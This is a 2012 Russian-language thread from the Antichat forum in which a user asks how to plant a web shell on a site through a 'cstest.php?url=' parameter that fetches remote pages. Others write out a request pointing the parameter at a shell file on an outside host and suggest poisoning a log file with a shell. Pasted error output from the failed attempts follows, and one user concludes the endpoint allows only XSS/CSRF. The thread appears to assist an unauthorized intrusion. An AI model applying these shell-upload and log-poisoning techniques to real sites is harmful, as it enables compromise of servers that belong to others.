ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Нужна помощь с заливкой shell'a (https://forum.antichat.xyz/showthread.php?t=343421)

StormAttack 23.07.2012 15:41
Есть сайт: https://site.com/cstest.php?url=

Eсли дописать ссылку https://site.com/cstest.php?url=http://site.ru/shell.php - то на сайте выводиться shell с моим сайтом.

Вопрос: можно ли залить Shell на сайт "https://site.com" ?

xxddz 23.07.2012 15:50
Попробуй

https://site.com/cstest.php?url=http://site.ru/shell.txt

StormAttack 23.07.2012 15:58
не прокатило...

вот что выбило:

Цитата:
Сообщение от None
posting to url: http://site.com/shell.txt
Array (
Код:
=> 200 [body] => [header] => HTTP/1.1 200 OK Date: Mon, 23 Jul 2012 10:50:33 GMT Server: LiteSpeed Accept-Ranges: bytes Connection: close ETag: "3870-500d2bf7-0" Last-Modified: Mon, 23 Jul 2012 10:48:23 GMT Content-Type: text/plain Content-Length: 14448 )
Код:
[/QUOTE]
[/CODE]

[/QUOTE]

Chrome~ 23.07.2012 15:58
Цитата:
Сообщение от xxddz
Попробуй
https://site.com/cstest.php?url=http://site.ru/shell.txt
Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.

Цитата:
Сообщение от StormAttack
не прокатило...
вот что выбило:
Хотя не iframe, скорее всего, а сайт просто пытается скачать и вывести страницу, которая передается в параметре url.

человек-паук 23.07.2012 16:01
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом

StormAttack 23.07.2012 16:02
Цитата:
Сообщение от Chrome~
Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.
это не iframe, это форма с полями URL и FORM Body

StormAttack 23.07.2012 16:06
Цитата:
Сообщение от человек-паук
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом
локальные файлы не читает

Цитата:
Сообщение от None
0Array (
Код:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )
Код:
[/QUOTE]
[/CODE]

[/QUOTE]

Chrome~ 23.07.2012 16:07
Цитата:
Сообщение от StormAttack
это не iframe, это форма с полями URL и FORM Body
Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.

Цитата:
Сообщение от StormAttack
локальные файлы не читает
Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.

StormAttack 23.07.2012 16:11
Цитата:
Сообщение от Chrome~
Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.
Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.
Понятно, спасибо.

totenkopf 02.08.2012 10:07
Цитата:
Сообщение от None
0Array (
Код:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )
Код:


А чего он пытается его отрезолвить как хост?
Запрос покажи.
[/QUOTE]

А чего он пытается его отрезолвить как хост?
Запрос покажи.
[/CODE]

[/QUOTE]


Время: 06:08